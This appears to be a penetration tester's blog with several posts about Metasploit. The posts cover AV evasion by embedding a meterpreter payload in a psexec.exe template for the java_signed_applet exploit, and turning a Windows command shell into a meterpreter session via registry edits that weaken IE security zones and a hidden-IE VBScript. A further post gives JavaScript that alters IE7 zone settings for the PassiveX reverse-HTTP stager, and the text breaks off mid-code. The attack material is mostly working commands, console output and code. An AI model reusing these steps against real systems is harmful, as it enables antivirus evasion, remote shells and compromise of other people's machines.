<b>Invisible Denizen</b> (blog by <a href="http://www.blogger.com/profile/08165445198675206275">Nathan Keltner</a>; feed last updated 2024-03-08)<br /><br /><b>java_signed_applet AV Detection</b> (Nathan Keltner, 2010-03-31)<br /><br /><div>(Sorry for the wonky spacing below. I seem to have forgotten how to best display code in Blogger.)</div><div><br /></div>Any module in metasploit that generates and drops an executable uses the <a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/lib/msf/util/exe.rb">Msf::Util::EXE.to_win32pe</a> function. This is the same function used by ./msfpayload to generate Windows executables, and takes a number of options which are usually not exposed via the exploit module and therefore can't easily be modified during an exploit run using ./msfconsole.<div><br /></div><div>As of <a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8966">r8966</a>, <a href="http://www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/multi/browser/java_signed_applet.rb">multi/browser/java_signed_applet</a> now exposes these options to help evade antivirus detection.</div><div><br /></div><div>When using a default exploit run, this is what you will see:</div><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>nathan@polaris:/pentest/exploits/msf3-commit$ ./msfconsole<br /><br /> _ _<br /> _ | | (_)_<br />____ ____| |_ ____ ___ ____ | | ___ _| |_<br />| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)<br />| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__<br />|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)<br /> |_|<br /><br /><br />=[ metasploit v3.3.4-dev [core:3.3 api:1.0]<br />+ -- --=[ 538 
exploits - 256 auxiliary<br />+ -- --=[ 198 payloads - 23 encoders - 8 nops<br />=[ svn r8964 updated today (2010.03.31)<br /><br />msf exploit(java_signed_applet) > set URIPATH /<br />URIPATH => /<br />msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp<br />payload => windows/meterpreter/reverse_tcp<br />msf exploit(java_signed_applet) > set LHOST 10.10.10.43<br />LHOST => 10.10.10.43<br />msf exploit(java_signed_applet) > exploit<br />[*] Exploit running as background job.<br />msf exploit(java_signed_applet) ><br />[*] Started reverse handler on 10.10.10.43:4444<br />[*] Using URL: http://0.0.0.0:8080/<br />[*] Local IP: http://10.10.10.43:8080/<br />[*] Server started.<br /><br />msf exploit(java_signed_applet) ><br />[*] Handling request from 10.10.10.102:5822...<br />[*] Generated executable to drop (37888 bytes).<br />[*] Compiling applet classes...<br />[*] Compile completed. Building jar file...<br />[*] Jar built. Signing...<br />[*] Jar signed. Ready to send.<br /><br /></code></pre>At this point, McAfee or what have you just popped up on the target laptop, blocking the default generated exe.<div></div><div><br /></div><div>For a quick background, executable generation in metasploit uses a template.exe file by default that is kept in the msf/data/templates/ directory. This is a dummy exe that is merely used for a framework around the payload we actually want to execute. As of the last exec overhaul, this exe can now be virtually any Windows executable that has enough space inside it to allow the msf payload to be sliced in.</div><div><br /></div><div>Additionally, as of <a href="http://www.metasploit.com/redmine/projects/framework/repository/revisions/8896">r8896</a>, executables can now act as a binder, where the payload is spawned as a new thread of the executable and will run in the background while the original executable executes. 
This is the new :insert option added to Msf::Util::EXE.to_win32pe.</div><div><br /></div><div>Now, by modifying the default :template option (via the 'Template' Advanced Option), we can evade almost all AV.</div><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>nathan@polaris:/tmp$ wget http://download.sysinternals.com/Files/PsTools.zip<br />--2010-03-31 17:21:26-- http://download.sysinternals.com/Files/PsTools.zip<br />Resolving download.sysinternals.com... 207.46.140.23<br />Connecting to download.sysinternals.com|207.46.140.23|:80... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 1380351 (1.3M) [application/x-zip-compressed]<br />Saving to: `PsTools.zip'<br /><br />100%[===================================================================================================================>] 1,380,351 408K/s in 3.3s <br /><br />2010-03-31 17:21:29 (408 KB/s) - `PsTools.zip' saved [1380351/1380351]<br /><br />nathan@polaris:/tmp$ mkdir pstools && mv PsTools.zip pstools && cd pstools && unzip PsTools.zip<br />Archive: PsTools.zip<br />inflating: psexec.exe <br />inflating: psfile.exe <br />inflating: psgetsid.exe <br />inflating: Psinfo.exe <br />inflating: pskill.exe <br />inflating: pslist.exe <br />inflating: psloggedon.exe <br />inflating: psloglist.exe <br />inflating: pspasswd.exe <br />inflating: psservice.exe <br />inflating: psshutdown.exe <br />inflating: pssuspend.exe <br />inflating: Pstools.chm <br />extracting: psversion.txt <br />inflating: pdh.dll <br />inflating: Eula.txt <br />nathan@polaris:/tmp/pstools$ cd $MSF<br />nathan@polaris:/pentest/exploits/msf3-commit$ ./msfconsole<br /><br /> _ _ _ _<br /> | | | | (_) |<br />_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_<br />| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|<br />| | | | | | __/ || 
(_| \__ \ |_) | | (_) | | |_<br />|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|<br /> | |<br /> |_|<br /><br /><br /> =[ metasploit v3.3.4-dev [core:3.3 api:1.0]<br />+ -- --=[ 538 exploits - 256 auxiliary<br />+ -- --=[ 198 payloads - 23 encoders - 8 nops<br /> =[ svn r8964 updated today (2010.03.31)<br /><br />msf exploit(java_signed_applet) > set payload windows/meterpreter/reverse_tcp<br />payload => windows/meterpreter/reverse_tcp<br />msf exploit(java_signed_applet) > set LHOST 10.10.10.43<br />LHOST => 10.10.10.43<br />msf exploit(java_signed_applet) > show options<br /><br />Module options:<br /><br />Name Current Setting Required Description<br />---- --------------- -------- -----------<br />AppletName SiteLoader yes The main applet's class name.<br />CertCN Metasploit Inc. yes The CN= value for the certificate.<br />PayloadName SiteSupport yes The payload classes name.<br />SRVHOST 0.0.0.0 yes The local host to listen on.<br />SRVPORT 8080 yes The local port to listen on.<br />SSL false no Negotiate SSL for incoming connections<br />SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)<br />URIPATH no The URI to use for this exploit (default is random)<br /><br /><br />Payload options (windows/meterpreter/reverse_tcp):<br /><br />Name Current Setting Required Description<br />---- --------------- -------- -----------<br />EXITFUNC process yes Exit technique: seh, thread, process<br />LHOST 10.10.10.43 yes The local address<br />LPORT 4444 yes The local port<br /><br /><br />Exploit target:<br /><br />Id Name<br />-- ----<br />1 Windows x86 (Native Payload)<br /><br /><br />msf exploit(java_signed_applet) > set URIPATH /<br />URIPATH => /<br />msf exploit(java_signed_applet) > show advanced<br /><br />Module advanced options:<br /><br />Name : AddClassPath<br />Current Setting:<br />Description : Additional java classpath<br /><br />Name : ContextInformationFile<br />Current Setting:<br />Description : The 
information file that contains context information<br /><br />Name : DisablePayloadHandler<br />Current Setting: false<br />Description : Disable the handler code for the selected payload<br /><br />Name : EnableContextEncoding<br />Current Setting: false<br />Description : Use transient context when encoding payloads<br /><br />Name : InsertPayload<br />Current Setting:<br />Description : Inject payload into template without affecting executable<br /> behavior<br /><br />Name : JavaCache<br />Current Setting: /home/nathan/.msf3/javacache<br />Description : Java cache location<br /><br />Name : SaveToFile<br />Current Setting:<br />Description : When set, source is saved to this directory under<br /> external/source/<br /><br />Name : Template<br />Current Setting: /pentest/exploits/msf3-commit/data/templates/template.exe<br />Description : The default executable template to use<br /><br />Name : WORKSPACE<br />Current Setting:<br />Description : Specify the workspace for this module<br /><br /><br /><br />Payload advanced options (windows/meterpreter/reverse_tcp):<br /><br />Name : AutoLoadStdapi<br />Current Setting: true<br />Description : Automatically load the Stdapi extension<br /><br />Name : AutoRunScript<br />Current Setting:<br />Description : A script to automatically on session creation.<br /><br />Name : AutoSystemInfo<br />Current Setting: true<br />Description : Automatically capture system information on initialization.<br /><br />Name : InitialAutoRunScript<br />Current Setting:<br />Description : An initial script to run on session created (before<br /> AutoRunScript)<br /><br />Name : ReverseConnectRetries<br />Current Setting: 5<br />Description : The number of connection attempts to try before exiting the<br /> process<br /><br />Name : WORKSPACE<br />Current Setting:<br />Description : Specify the workspace for this module<br /><br /><br />msf exploit(java_signed_applet) > set Template /tmp/pstools/psexec.exe<br />Template => 
/tmp/pstools/psexec.exe<br />msf exploit(java_signed_applet) > exploit<br />[*] Exploit running as background job.<br />msf exploit(java_signed_applet) ><br />[*] Started reverse handler on 10.10.10.43:4444<br />[*] Using URL: http://0.0.0.0:8080/<br />[*] Local IP: http://10.10.10.43:8080/<br />[*] Server started.<br /><br />msf exploit(java_signed_applet) ><br />[*] Handling request from 10.10.10.102:5805...<br />[*] Generated executable to drop (381304 bytes).<br />[*] Compiling applet classes...<br />[*] Compile completed. Building jar file...<br />[*] Jar built. Signing...<br />[*] Jar signed. Ready to send.<br />[*] Sending SiteLoader.jar to 10.10.10.102:5806. Waiting for user to click 'accept'...<br />[*] Sending SiteLoader.jar to 10.10.10.102:5806. Waiting for user to click 'accept'...<br />[*] Sending stage (748032 bytes) to 10.10.10.102<br />[*] Meterpreter session 1 opened (10.10.10.43:4444 -> 10.10.10.102:5807)<br /><br />msf exploit(java_signed_applet) > sessions -i 1<br />[*] Starting interaction with 1...<br /><br />meterpreter > getpid<br />Current pid: 4284<br />meterpreter > exit<br /><br />[*] Meterpreter session 1 closed. 
Reason: User exit<br />msf exploit(java_signed_applet) > exit<br /><br />[*] Server stopped.<br /></code></pre><br /><br /><b>2009 Information Warfare Summit</b> (Nathan Keltner, 2009-05-21)<br /><br />I gave a presentation at OKC ISSA's 2009 Information Warfare Summit yesterday, covering:<br /><br />- common info sec weaknesses,<br />- new data from Verizon's 2009 Data Breach Incident Report,<br />- my reactions to the data / expectations / etc.,<br />- high-level recommendations<br /><br />If interested, it is located <a href="http://sites.google.com/a/invisibledenizen.org/upload/asdf/20090520IWS-CommonInfoSecWeaknesses-FlatEarth.pdf?attredirects=0">here</a>.<br /><br /><b>DC405 Presentation</b> (Nathan Keltner, 2009-03-20)<br /><br />On Friday I gave a talk to OKC's <a href="http://dc405.org">DC405</a> group on Metasploit and reverse tunneling out of strict network environments using PassiveX payloads. Unfortunately, we ended up without an available projector, so I gave the presentation by having everyone load it up on their laptops, using this blog and twitter to kick out links. :)<br /><br />All in all, it was a great group and spawned an impressive discussion afterwards. 
Thanks #dc405 for letting me come be a part of the group!<br /><br />Title:<br />"Advances in HTTP encapsulated payloads<br />Or, a Young Metasploit User's Illustrated Primer"<br /><br />DC405<br />03/20/2009<br /><br />Link: <a href="http://sites.google.com/a/invisibledenizen.org/upload/asdf/20090320HTTPPayloads1520.pdf">DC405 - HTTP Encapsulated Payloads</a><br /><br /><b>Common Info Security Weaknesses</b> (Nathan Keltner, 2009-03-05)<br /><br />Today I gave a presentation to the <a href="http://www.isacacentralok.org">Oklahoma City</a> <a href="http://isaca.org">ISACA</a> chapter titled "Common Enterprise Security Weaknesses", which was a semi-random collection of observations from penetration tests in the OK, TX, and KS markets. Just in case anyone's interested, here's a link:<br /><br /><a href="http://sites.google.com/a/invisibledenizen.org/upload/asdf/CommonInfoSecurityWeaknesses.pdf">Common Information Security Weaknesses (pdf)</a><br /><br /><b>How to get meterpreter from shell in Windows</b> (Nathan Keltner, 2009-02-17)<br /><br />(Update: just realized my formatting's off a tad and chopping off the end of some of those commands. 
If you copy/paste you'll be able to see the very end of the cmd.)<br /><br />Inspired by darkoperator's <a href="http://darkoperator.blogspot.com/2009/02/how-to-get-terminal-from-shell-in.html">How to get Terminal from Shell in Windows</a> post, here's a quick howto on a way to go from cmd shell to meterpreter shell (or any other msf payload).<br /><br />I've run into situations on pentests where I can run individual commands on a machine but want to elevate to a full, interactive shell with all the bells and whistles a meterpreter shell gives you. Scenarios where I've used similar techniques:<br /><ul><li>SQL injection in an application allows you to run commands (Oracle, MS SQL Server)<br /></li><li>Obtained (cracked, sniffed, whatever) a dba/sa level account in Oracle/MS SQL Server<br /></li><li>Registry access only (e.g. this <a href="http://trac.metasploit.com/browser/framework3/trunk/modules/auxiliary/admin/backupexec/registry.rb">Veritas Backup vuln</a> from 2005)</li><li>Some sort of PHP vuln on a WAMP server that grants you a piped command shell only</li></ul>There are two main ways to load additional code onto the machine: modify IE permissions and use a passivex payload or download a file from the internet and execute it. For this round, I'll just show how to use a passivex payload, but if you want to download a file you can either use ftp commands or xmlhttp inside vbscript. 
(Google will have many results on these; maybe I'll write up a howto later.)<br /><br />To start, we'll need an msf handler running somewhere accessible from the client to accept our connection request once the payload has been executed:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>root@bt:/pentest/exploits/framework3# ./msfconsole<br /><br /> 888 888 d8b888<br /> 888 888 Y8P888<br /> 888 888 888<br />88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888<br />888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888<br />888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888<br />888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.<br />888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888<br /> 888<br /> 888<br /> 888<br /><br /><br /> =[ msf v3.3-dev<br />+ -- --=[ 345 exploits - 223 payloads<br />+ -- --=[ 20 encoders - 7 nops<br /> =[ 123 aux<br /><br />msf > use multi/handler<br />msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http<br />PAYLOAD => windows/meterpreter/reverse_http<br />msf exploit(handler) > ifconfig<br />[*] exec: ifconfig<br /><br />eth1 Link encap:Ethernet HWaddr 00:0c:29:b0:10:8e<br /> inet addr:192.168.206.129 Bcast:192.168.206.255 Mask:255.255.255.0<br /> inet6 addr: fe80::20c:29ff:feb0:108e/64 Scope:Link<br /> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br /> RX packets:1218 errors:0 dropped:0 overruns:0 frame:0<br /> TX packets:1023 errors:0 dropped:0 overruns:0 carrier:0<br /> collisions:0 txqueuelen:1000<br /> RX bytes:389976 (389.9 KB) TX bytes:121421 (121.4 KB)<br /> Interrupt:18 Base address:0x2080<br /><br />lo Link encap:Local Loopback<br /> inet addr:127.0.0.1 Mask:255.0.0.0<br /> inet6 addr: ::1/128 Scope:Host<br /> UP LOOPBACK RUNNING 
MTU:16436 Metric:1<br /> RX packets:0 errors:0 dropped:0 overruns:0 frame:0<br /> TX packets:0 errors:0 dropped:0 overruns:0 carrier:0<br /> collisions:0 txqueuelen:0<br /> RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)<br /><br />msf exploit(handler) > set PXHOST 192.168.206.129<br />PXHOST => 192.168.206.129<br />msf exploit(handler) > show options<br /><br />Module options:<br /><br />Name Current Setting Required Description<br />---- --------------- -------- -----------<br /><br /><br />Payload options (windows/meterpreter/reverse_http):<br /><br />Name Current Setting Required Description<br />---- --------------- -------- -----------<br />EXITFUNC seh yes Exit technique: seh, thread, process<br />PXAXCLSID B3AC7307-FEAE-4e43-B2D6-161E68ABA838 yes ActiveX CLSID<br />PXAXDLL /pentest/exploits/framework3/data/passivex/passivex.dll yes ActiveX DLL to inject<br />PXAXVER -1,-1,-1,-1 yes ActiveX DLL Version<br />PXHOST 192.168.206.129 yes The local HTTP listener hostname<br />PXPORT 8080 yes The local HTTP listener port<br />PXURI /RFT74xFlyWB2IYexlRLSq9txAgowPyi4 no The URI root for requests<br /><br /><br />Exploit target:<br /><br />Id Name<br />-- ----<br />0 Wildcard Target<br /><br /><br />msf exploit(handler) > exploit<br /><br />[*] PassiveX listener started.<br />[*] Starting the payload handler...<br /></code></pre><br />Next, the commands to kick through to your command shell. 
First we'll be modifying the registry to add a new IP address into the Intranet zone:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v ":Range" /d "192.168.206.129"<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v "*" /t REG_DWORD /d 1<br /><br />The operation completed successfully<br /><br />C:\><br /></code></pre><br />Next we'll be adding the necessary permissions to the Intranet zone. (For a discussion on what settings are needed, refer to <a href="http://blog.invisibledenizen.org/2009/02/updating-passivex-handler-to-work-with.html">this post</a>.)<br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1001" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1004" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1200" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1201" /t REG_DWORD /d 0<br /><br />The operation completed 
successfully<br /><br />C:\>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1208" /t REG_DWORD /d 0<br /><br />The operation completed successfully<br /><br />C:\><br /></code></pre><br />From here, I usually write a vbscript to disk that will launch an invisible instance of Internet Explorer pointed to your msf server. If for some reason you didn't care about IE being visible, you could always just execute it directly from your command shell, but assuming you don't want a big IE window to pop up on the server, here's what you run:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>C:\>echo CreateObject("Wscript.Shell").Run "iexplore.exe -new http://192.168.206.129:8080/RFT74xFlyWB2IYexlRLSq9txAgowPyi4", 0, False > temp.vbs<br /><br />C:\>wscript temp.vbs<br /><br />C:\>del temp.vbs<br /><br />C:\><br /></code></pre><br />At this point, an invisible instance of IE is running and just loaded code from your msf server. 
Because you modified the registry settings to allow passivex to load, you now have a meterpreter shell running in your msf console:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>[*] Sending PassiveX main page to client<br />[*] Sleeping before handling stage...<br />[*] Sending stage to sid 1 (2650 bytes)<br />[*] Uploading DLL (75787 bytes)...<br />[*] Upload completed.<br />[*] Meterpreter session 1 opened (Local Pipe -> Remote Pipe)<br /><br />meterpreter > getpid<br />Current pid: 3048<br />meterpreter ><br /></code></pre><br />To recap, here are all of the windows commands used in this post:<br /><br /><b>Mapping an IP address to Internet Explorer's Intranet security zone:</b><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v ":Range" /d "192.168.206.129"<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\randomname" /v "*" /t REG_DWORD /d 1<br /></code></pre><br /><b>Configuring the Intranet zone to autoload passivex:</b><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1001" /t REG_DWORD /d 0<br />reg ADD 
"HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1004" /t REG_DWORD /d 0<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1200" /t REG_DWORD /d 0<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1201" /t REG_DWORD /d 0<br />reg ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1" /v "1208" /t REG_DWORD /d 0<br /></code></pre><br /><b>Creating vbscript to invisibly launch internet explorer pointed to our msf server:</b><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>echo CreateObject("Wscript.Shell").Run "iexplore.exe -new http://192.168.206.129:8080/RFT74xFlyWB2IYexlRLSq9txAgowPyi4", 0, False > temp.vbs<br /></code></pre><br /><b>Running our vbscript and deleting temp.vbs:</b><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code>wscript temp.vbs<br />del temp.vbs<br /></code></pre>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com4tag:blogger.com,1999:blog-8542235839869152787.post-42570645853583368882009-02-03T21:34:00.000-08:002009-02-03T22:48:41.771-08:00Updating the passivex handler to work with IE7If you've ever played with metasploit before, you may have wondered what all of the windows/*/reverse_http payloads were:<br /><br /><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); 
font-size: 12px; line-height: 14px; width: 100%;"><code>msf exploit(handler) > search reverse_http<br />[*] Searching loaded modules for pattern 'reverse_http'...<br /><br />Compatible payloads<br />===================<br /><br /> Name Description<br /> ---- -----------<br /> generic/debug_trap/reverse_http Generic x86 Debug Trap, PassiveX Reverse HTTP Tunneling Stager<br /> windows/dllinject/reverse_http Windows Inject DLL, PassiveX Reverse HTTP Tunneling Stager<br /> windows/download_exec/reverse_http Windows Executable Download and Execute, PassiveX Reverse HTTP Tunneling Stager<br /> windows/exec/reverse_http Windows Execute Command, PassiveX Reverse HTTP Tunneling Stager<br /> windows/meterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager<br /> windows/reflectivedllinject/reverse_http Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager<br /> windows/reflectivemeterpreter/reverse_http Windows Meterpreter, PassiveX Reverse HTTP Tunneling Stager<br /> windows/reflectivevncinject/reverse_http Reflective VNC Dll Injection, PassiveX Reverse HTTP Tunneling Stager<br /> windows/shell/reverse_http Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager<br /> windows/upexec/reverse_http Windows Upload/Execute, PassiveX Reverse HTTP Tunneling Stager<br /> windows/vncinject/reverse_http Windows VNC Inject, PassiveX Reverse HTTP Tunneling Stager<br /></code></pre><br />Background detail on how this stager works is available in skape's <a href="http://uninformed.org/index.cgi?v=" a="3">excellent uninformed journal article</a>.<br /><br /><b>A quick overview:</b><br /><br />Passivex is an ActiveX control that implements a tunnel running inside IE for your <a href="http://metasploit.com/">msf payloads</a>. As such, it gets things like network proxy configuration for free! Imagine an environment that blocked all outgoing ports -- but allowed users to browse the internet as long as they used the company's HTTP proxy. 
In these scenarios, a normal reverse_tcp payload will not work, because it will be blocked by the company's firewall. If you use a reverse_http payload, however, it'll float right through the HTTP proxy and connect back to your msf server! Assuming the user is already authenticated to the firewall/proxy, IE will helpfully log them in for you, too.<br /><br />Unfortunately, there are a few restrictions with the current passivex stager:<br /><ul><li>It only works with IE6 due to a new IE7 security setting</li><li>It permanently neuters the security settings for your IE's <a href="http://support.microsoft.com/kb/174360/">Internet zone</a>, giving every website IE6 users visit the option of running commands on the vulnerable machine</li><li>In IE7, not only does it not function, but the first website they visit after you've attempted a passivex payload is greeted with this huge, nasty warning:</li></ul><img src="http://sites.google.com/a/invisibledenizen.org/upload/asdf/ie_security_warning.PNG" /><br /><br />When you use one of these payloads, it:<br /><ol><li>Modifies registry entries located at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ that correspond to the "Download signed ActiveX controls", "Download unsigned ActiveX controls", "Run ActiveX controls and plug-ins", and "Initialize and script ActiveX controls not marked as safe for scripting" security settings.</li><li>Launches an iexplore.exe marked to be invisible (you see a new process in task manager only -- no window) pointed towards your msf server</li><li>Msf responds with some HTTP that instantiates the passivex ActiveX control</li><li>The passivex control begins communication, pulling down whatever payload you selected and piping its output/input back to the msf server</li></ol>An ideal version of passivex would work in both IE6 and IE7, would limit its impact on the compromised system, would clean up after itself whenever it's done, and would not increase the size of the 
initial stager.<br /><br />To keep the initial size small and because it was easiest, I implemented all of this in the javascript of the 3rd item, above. This is possible because the "Initialize and script ActiveX controls not marked as safe for scripting" setting grants access to modify the registry (assuming the user has rights) and run commands. The javascript:<br /><ul><li>Drops your IP address into the <b>Intranet</b> security zone</li><li>Modifies the 4 settings above, plus the new setting "Allow previously unused ActiveX controls to run without prompt", for the Intranet zone</li><li>Launches a second copy of IE that will run under the new permissions</li><li>Restores the <b>Internet</b> security zone to its default settings</li><li>Waits 60 seconds and then restores the <b>Intranet</b> security settings to the default<br /></li></ul>Below is the beta code that does just that. Replace ~line 317 of lib/msf/core/handler/passivex.rb, where it sets the resp.body variable, with the below, restart metasploit, and you should be good to go.<br /><br />Still to do:<br /><ul><li>Randomize variables, remove white space inside needed variables, then randomize whitespace</li><li>Implement HTTPS for encryption (this shouldn't be hard; ruby/msf already support it)</li><li>Modify the ASM block in the initial stager to not modify all the extra security settings; it now only needs to modify 1201, "Initialize and script ActiveX controls not marked as safe for scripting"<br /></li></ul><pre style="border: 1px dashed rgb(153, 153, 153); padding: 5px; overflow: auto; font-family: Andale Mono,Lucida Console,Monaco,fixed,monospace; color: rgb(0, 0, 0); background-color: rgb(238, 238, 238); font-size: 12px; line-height: 14px; width: 100%;"><code> # fixed to work with IE7<br /> resp.body = %Q^<html> <br /><object classid="CLSID:#{datastore['PXAXCLSID']}" codebase="#{datastore['PXURI']}/passivex.dll##{datastore['PXAXVER']}"> <br /> <param name="HttpHost" value="#{datastore['PXHOST']}"> <br 
/> <param name="HttpPort" value="#{datastore['PXPORT']}"><br /> <param name="HttpUriBase" value="#{datastore['PXURI']}"> <br /> <param name="HttpSid" value="#{nsid}">^ + ((stage_payload) ? %Q^<br /> <param name="DownloadSecondStage" value="1">^ : "") + %Q^<br /></object><br /><script><br />var WshShell = new ActiveXObject("Wscript.Shell");<br />var marker = true;<br />var regCheck;<br />var regRange = "HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Ranges\\\\random\\\\" //Can be any value<br />var regIntranet = "HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\1\\\\";<br /><br />//Check if we've run this before.<br />try { regCheck = WshShell.RegRead(regRange + "marker"); } catch (e) { marker = false; }<br /><br />if (marker == false) {<br /> //Modify perms for the Intranet zone.<br /> WshShell.RegWrite(regIntranet + "1001",0,"REG_DWORD");<br /> WshShell.RegWrite(regIntranet + "1004",0,"REG_DWORD");<br /> WshShell.RegWrite(regIntranet + "1200",0,"REG_DWORD");<br /> WshShell.RegWrite(regIntranet + "1201",0,"REG_DWORD");<br /> WshShell.RegWrite(regIntranet + "1208",0,"REG_DWORD");<br /><br /> //Map IP to the newly modified zone.<br /> WshShell.RegWrite(regRange,1,"REG_SZ");<br /> WshShell.RegWrite(regRange + ":Range","#{datastore['PXHOST']}","REG_SZ");<br /> WshShell.RegWrite(regRange + "*",1,"REG_DWORD");<br /> WshShell.RegWrite(regRange + "marker",1,"REG_DWORD"); //Just a marker<br /><br /> //Clean up after the original passivex stage1 loader; reset to default IE7 install<br /> var regDefault = "HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\Zones\\\\3\\\\";<br /> WshShell.RegWrite(regDefault + "1001",1,"REG_DWORD");<br /> WshShell.RegWrite(regDefault + "1004",3,"REG_DWORD");<br /> WshShell.RegWrite(regDefault + "1200",0,"REG_DWORD");<br /> WshShell.RegWrite(regDefault + "1201",3,"REG_DWORD");<br /><br /> //Clean up 
